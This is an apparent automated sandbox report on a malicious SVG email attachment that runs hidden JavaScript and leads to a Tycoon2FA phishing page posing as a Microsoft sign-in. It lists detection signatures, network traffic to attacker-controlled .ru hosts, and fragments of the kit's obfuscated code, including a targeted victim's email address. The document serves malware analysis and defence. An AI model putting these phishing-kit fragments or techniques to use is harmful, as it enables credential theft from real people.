Edit tour

Windows Analysis Report
ATT61918.svg

Overview

General Information

Sample name:ATT61918.svg
Analysis ID:1642737
MD5:b250e4389dc708b769c09aefc6066a68
SHA1:1a985cdebc2d5ac203a4f681cb279170c666d7b1
SHA256:50bf02e935e6754db041b9217fce6a217ae70a600650f205bf302ab9125c8982
Infos:

Detection

HTMLPhisher, Invisible JS, Tycoon2FA
Score:100
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Yara detected AntiDebug via timestamp check
Yara detected HtmlPhish10
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
AI detected suspicious Javascript
Yara detected JavaScript embedded in SVG
Creates files inside the system directory
Deletes files inside the Windows folder
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • chrome.exe (PID: 2972 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\ATT61918.svg MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 5580 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2112,i,14787941523726890264,17660487757620399097,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2180 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
SourceRuleDescriptionAuthorStrings
ATT61918.svgJoeSecurity_JavaScriptembeddedinSVGYara detected JavaScript embedded in SVGJoe Security
    SourceRuleDescriptionAuthorStrings
    dropped/chromecache_87JoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
      SourceRuleDescriptionAuthorStrings
      0.0.pages.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
        0.0.pages.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
          0.0.pages.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
            0.1.pages.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
              0.1.pages.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
                Click to see the 28 entries
                No Sigma rule has matched
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                Phishing

                barindex
                Source: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'., The URL 'jx7d.qdjcpol.ru' does not match the legitimate domain for Microsoft., The domain 'qdjcpol.ru' is unrelated to Microsoft and uses a Russian domain extension, which is unusual for a Microsoft-related site., The URL contains random characters and does not resemble any known Microsoft subdomains or services., The email domain 'spirehealthcare.com' is unrelated to Microsoft, which raises further suspicion. DOM: 1.3.pages.csv
                Source: Yara matchFile source: 1.3.pages.csv, type: HTML
                Source: Yara matchFile source: 1.4.pages.csv, type: HTML
                Source: Yara matchFile source: 1.5.pages.csv, type: HTML
                Source: Yara matchFile source: 1.6.pages.csv, type: HTML
                Source: Yara matchFile source: 1.7.pages.csv, type: HTML
                Source: Yara matchFile source: 0.0.pages.csv, type: HTML
                Source: Yara matchFile source: 0.1.pages.csv, type: HTML
                Source: Yara matchFile source: 0.0.d.script.csv, type: HTML
                Source: Yara matchFile source: 0.0.pages.csv, type: HTML
                Source: Yara matchFile source: 0.1.pages.csv, type: HTML
                Source: Yara matchFile source: 0.0.d.script.csv, type: HTML
                Source: Yara matchFile source: 1.17..script.csv, type: HTML
                Source: Yara matchFile source: dropped/chromecache_87, type: DROPPED
                Source: Yara matchFile source: 1.16.d.script.csv, type: HTML
                Source: Yara matchFile source: 0.0.pages.csv, type: HTML
                Source: Yara matchFile source: 0.1.pages.csv, type: HTML
                Source: Yara matchFile source: 0.2.d.script.csv, type: HTML
                Source: Yara matchFile source: 0.3..script.csv, type: HTML
                Source: Yara matchFile source: 1.11..script.csv, type: HTML
                Source: Yara matchFile source: 0.9.d.script.csv, type: HTML
                Source: Yara matchFile source: 1.12..script.csv, type: HTML
                Source: Yara matchFile source: 1.3.pages.csv, type: HTML
                Source: Yara matchFile source: 1.4.pages.csv, type: HTML
                Source: Yara matchFile source: 1.5.pages.csv, type: HTML
                Source: Yara matchFile source: 1.6.pages.csv, type: HTML
                Source: Yara matchFile source: 1.7.pages.csv, type: HTML
                Source: 0.2.d.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common keyboard shortcuts, and redirecting the user to an external website. The combination of these behaviors strongly suggests malicious intent, likely for the purpose of preventing analysis or user interaction. The script also uses obfuscation techniques, further increasing the risk.
                Source: 0.1..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://jx7d.qdjcpol.ru/WpB8P/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `atob()` and `decodeURIComponent()` to decode and execute remote code is a clear indicator of malicious intent. Additionally, the script appears to be sending user data to an untrusted domain, which poses a significant risk of data theft or other malicious activities. Overall, this script exhibits a high level of suspicion and should be treated as a potential security threat.
                Source: 0.8..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://jx7d.qdjcpol.ru/WpB8P/... This script demonstrates several high-risk behaviors, including dynamic code execution, potential data exfiltration, and suspicious redirection. The use of obfuscated code, the presence of a debugger, and the attempt to override the context menu and keyboard events suggest malicious intent. Overall, this script poses a significant security risk and should be treated with caution.
                Source: 0.0.d.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates several high-risk behaviors, including dynamic code execution via `eval()`, potential data exfiltration, and the use of obfuscated code. The combination of these factors indicates a high likelihood of malicious intent, warranting further investigation.
                Source: 0.9.d.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... This script demonstrates several high-risk behaviors, including:1. Detecting the presence of a web driver or automation tool, which could indicate an attempt to bypass security measures.2. Intercepting and preventing common keyboard shortcuts and right-click functionality, which could be used to restrict user interaction.3. Implementing a debugger-based redirection mechanism that could be used to redirect users to a malicious site.The combination of these behaviors, along with the lack of any clear legitimate purpose, suggests this script is highly suspicious and likely intended for malicious purposes. Therefore, it receives a high-risk score of 9.
                Source: Yara matchFile source: ATT61918.svg, type: SAMPLE
                Source: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKHTTP Parser: Number of links: 0
                Source: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKHTTP Parser: <input type="password" .../> found but no <form action="...
                Source: https://jx7d.qdjcpol.ru/WpB8P/#bWVsYW5pZS53YWx0b25Ac3BpcmVoZWFsdGhjYXJlLmNvbQ==HTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Tech Solutions - Innovating the Future</title> <style> body { font-family: Arial, sans-serif; ...
                Source: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKHTTP Parser: Title: Login For Secure Access does not match URL
                Source: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKHTTP Parser: Invalid link: Terms of use
                Source: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKHTTP Parser: Invalid link: Privacy & cookies
                Source: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKHTTP Parser: Invalid link: Terms of use
                Source: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKHTTP Parser: Invalid link: Privacy & cookies
                Source: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKHTTP Parser: Invalid link: Terms of use
                Source: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKHTTP Parser: Invalid link: Privacy & cookies
                Source: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKHTTP Parser: Invalid link: Terms of use
                Source: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKHTTP Parser: Invalid link: Privacy & cookies
                Source: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKHTTP Parser: Invalid link: Terms of use
                Source: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKHTTP Parser: Invalid link: Privacy & cookies
                Source: https://jx7d.qdjcpol.ru/WpB8P/HTTP Parser: function syemeyjfbj(){jvplqwfdih = atob("pcfet0nuwvbfigh0bww+cjxodg1sigxhbmc9imvuij4kpghlywq+ciagpg1ldgegy2hhcnnldd0ivvrgltgipgogidxtzxrhig5hbwu9inzpzxdwb3j0iibjb250zw50psj3awr0ad1kzxzpy2utd2lkdggsigluaxrpywwtc2nhbgu9ms4wij4kica8dgl0bgu+vgvjacbtb2x1dglvbnmglsbjbm5vdmf0aw5nihrozsbgdxr1cmu8l3rpdgxlpgogidxzdhlszt4kicagigjvzhkgewogicagicbmb250lwzhbwlsetogqxjpywwsihnhbnmtc2vyawy7ciagicagigxpbmutagvpz2h0oiaxljy7ciagicagig1hcmdpbjogmdskicagicagcgfkzgluzzogmdskicagicagymfja2dyb3vuzc1jb2xvcjogi2y0zjrmndskicagicagy29sb3i6icmzmzm7ciagicb9ciagicbozwfkzxigewogicagicbiywnrz3jvdw5koiajmda1ytllowogicagicbjb2xvcjogi2zmzjskicagicagcgfkzgluzzogmjbwecawowogicagicb0zxh0lwfsawduoibjzw50zxi7ciagicb9ciagicbozwfkzxigadegewogicagicbtyxjnaw46ida7ciagicagigzvbnqtc2l6ztogmi41cmvtowogicagfqogicagbmf2ihskicagicagymfja2dyb3vuzdogizmzmzskicagicagy29sb3i6icnmzmy7ciagicagihbhzgrpbmc6idewchg7ciagicagihrlehqtywxpz246ignlbnrlcjskicagih0kicagig5hdibhihskicagicagy29sb3i6icnmzmy7ciagicagihrlehqtzgvjb3jhdglvbjogbm9uztskicagicagbwfyz2luoiawide1chg7c...
                Source: anonymous functionHTTP Parser: var otherweburl = "";var websitenames = ["godaddy", "okta"];var bes = ["apple.com","netflix.com"];var pes = ["https:\/\/t.me\/","https:\/\/t.com\/","t.me\/","https:\/\/t.me.com\/","t.me.com\/","t.me@","https:\/\/t.me@","https:\/\/t.me","https:\/\/t.com","t.me","https:\/\/t.me.com","t.me.com","t.me\/@","https:\/\/t.me\/@","https:\/\/t.me@\/","t.me@\/","https:\/\/www.telegram.me\/","https:\/\/www.telegram.me"];var capnum = 1;var appnum = 1;var pvn = 0;var view = "";var pagelinkval = "uvyij";var emailcheck = "melanie.walton@spirehealthcare.com";var webname = "rtrim(/web8/, '/')";var urlo = "/rvc8hp5oiirctbrkrpswcixjnab1ln0ctozu45y5nsg36o4v3zhpkzoc4r7vgz";var gdf = "/ghrnv3bdyzneq4on8qgfb1yz8cyfw2yb5sr8bm1e7aab120";var odf = "/ijw1lxy7duxtst8ktplf1nyuvfolarhird4kedlvsvcd641";var twa = 0;var currentreq = null;var requestsent = false;var pagedata = "";var redirecturl = "";var useragent = navigator.useragent;var browsername;var userip;var usercountry;var errorcodeexecu...
                Source: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKHTTP Parser: <input type="password" .../> found
                Source: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKHTTP Parser: No favicon
                Source: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKHTTP Parser: No favicon
                Source: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKHTTP Parser: No favicon
                Source: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKHTTP Parser: No favicon
                Source: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKHTTP Parser: No favicon
                Source: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKHTTP Parser: No <meta name="author".. found
                Source: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKHTTP Parser: No <meta name="author".. found
                Source: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKHTTP Parser: No <meta name="author".. found
                Source: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKHTTP Parser: No <meta name="author".. found
                Source: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKHTTP Parser: No <meta name="author".. found
                Source: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKHTTP Parser: No <meta name="copyright".. found
                Source: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKHTTP Parser: No <meta name="copyright".. found
                Source: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKHTTP Parser: No <meta name="copyright".. found
                Source: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKHTTP Parser: No <meta name="copyright".. found
                Source: https://jx7d.qdjcpol.ru/QPBCJFDMNIGMJDIGUAH7ZCEPBPG1JDA6YY5CM3XFTWY6?HTZJCMWUCIAFCNDWGCFLPWFKHTTP Parser: No <meta name="copyright".. found
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
                Source: unknownHTTPS traffic detected: 104.21.78.6:443 -> 192.168.2.16:49699 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 151.101.194.137:443 -> 192.168.2.16:49702 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49703 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.16.2.189:443 -> 192.168.2.16:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.16.5.189:443 -> 192.168.2.16:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.186.36:443 -> 192.168.2.16:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.16:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.16:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.78.6:443 -> 192.168.2.16:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49726 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49727 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.16:49738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.33.187.68:443 -> 192.168.2.16:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.33.187.68:443 -> 192.168.2.16:49740 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.33.187.68:443 -> 192.168.2.16:49741 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.16:49742 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.33.187.120:443 -> 192.168.2.16:49743 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.1.100:443 -> 192.168.2.16:49772 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.0.100:443 -> 192.168.2.16:49773 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.16:49774 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 95.101.182.98:443 -> 192.168.2.16:49776 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 95.101.182.98:443 -> 192.168.2.16:49775 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.16:49777 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 95.101.182.89:443 -> 192.168.2.16:49778 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 95.101.182.89:443 -> 192.168.2.16:49779 version: TLS 1.2
                Source: chrome.exeMemory has grown: Private usage: 1MB later: 37MB
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /WpB8P/ HTTP/1.1Host: jx7d.qdjcpol.ruConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://jx7d.qdjcpol.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://jx7d.qdjcpol.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://jx7d.qdjcpol.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://jx7d.qdjcpol.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://jx7d.qdjcpol.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=BcTIDUzuuVgkslCyIY5gDZJNyulKXit9fDA3BsLjHrU-1742377698-1.0.1.1-yQQ41VHTXujax9HFrHWQf.Vijc.FEVZrknaJVbtbTInsfHOWlzIOjU4e12KCC0Pmmlv3poDHOQVc.w1BU5V8DEQqgqTNOaLodit2j3MJE_A
                Source: global trafficHTTP traffic detected: GET /gando!14n8b HTTP/1.1Host: vk3z.qxwhvv.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://jx7d.qdjcpol.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://jx7d.qdjcpol.ru/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /gando!14n8b HTTP/1.1Host: vk3z.qxwhvv.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
